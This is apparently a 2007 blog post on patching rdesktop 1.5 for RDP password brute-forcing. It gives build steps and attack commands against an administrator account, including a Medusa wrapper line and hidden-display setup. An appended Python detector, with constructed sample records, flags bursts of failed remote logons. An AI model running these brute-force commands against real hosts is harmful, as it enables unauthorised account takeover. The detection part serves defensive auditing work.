Saturday, October 06, 2007

Auditing RDP using Backtrack

First, there is no support by default for RDP auditing/cracking. To add it, we will patch rdesktop 1.5.

Follow these steps:

1. Remove the existing rdesktop package, using pkgtool.
2. Download rdesktop version 1.5 from www.rdesktop.org
3. Download the patch from http://www.foofus.net/jmk/rdesktop.html

Patching rdesktop

cd rdesktop-1.5.0/
patch -p1 -i rdp-brute-force-r805.diff
./configure
make
make install


Usage


Brute-force attack using password file:
rdesktop -u administrator -p passwords.txt 192.168.0.100

Brute-force attack sending passwords via STDIN:
rdesktop -u administrator -p - 192.168.0.100

The following example shows one way to use rdesktop with the MEDUSA wrapper module:

medusa -M wrapper -m TYPE:STDIN -m PROG:rdesktop -m ARGS:"-u %U -p - %H" -H hosts.txt -U users.txt -P passwords.txt

One possible method for hiding the graphical output from rdesktop:
% Xvfb :97 -ac -nolisten tcp &
% export DISPLAY=:97
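
Seen from the audited host, the password-file run above is a burst of failed logons for one account from one source address. The following Python example is added here (it is not part of the original post or of the rdesktop patch) and flags such bursts; the record layout, sample lines, threshold and window are constructed assumptions, and records are assumed to be in time order.

```python
import csv
from collections import defaultdict, deque
from datetime import datetime, timedelta
from io import StringIO

# Constructed sample of failed-logon records: time, logon type, account, source IP.
# (On current Windows these map to Security event 4625: LogonType,
# TargetUserName, IpAddress. Type 10 = RemoteInteractive, 3 = Network.)
SAMPLE = """\
2007-10-06T10:00:01,10,administrator,192.168.0.50
2007-10-06T10:00:04,10,administrator,192.168.0.50
2007-10-06T10:00:07,10,administrator,192.168.0.50
2007-10-06T10:00:09,2,alice,127.0.0.1
2007-10-06T10:00:10,10,administrator,192.168.0.50
2007-10-06T10:00:13,10,administrator,192.168.0.50
2007-10-06T10:05:00,10,bob,192.168.0.77
2007-10-06T11:30:00,10,bob,192.168.0.77
"""

REMOTE_TYPES = {"3", "10"}  # logon types a remote RDP attempt can produce


def find_guessing_runs(text, threshold=5, window=timedelta(seconds=60)):
    """Return {(source, account): peak failures seen inside one window}
    for every pair that reached `threshold` failed remote logons."""
    recent = defaultdict(deque)    # (source, account) -> timestamps in window
    peaks = {}
    for when, logon_type, account, source in csv.reader(StringIO(text)):
        if logon_type not in REMOTE_TYPES:
            continue               # console/service failures are out of scope
        ts = datetime.fromisoformat(when)
        key = (source, account.lower())
        q = recent[key]
        q.append(ts)
        while ts - q[0] > window:  # drop attempts older than the window
            q.popleft()
        if len(q) >= threshold:
            peaks[key] = max(peaks.get(key, 0), len(q))
    return peaks


if __name__ == "__main__":
    for (source, account), count in find_guessing_runs(SAMPLE).items():
        print(f"{source} -> {account}: {count} failed logons within 60s")
```

An account lockout policy on the target bounds how many guesses such a run can make; the detector shows which source and account to look at when the lockout fires.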

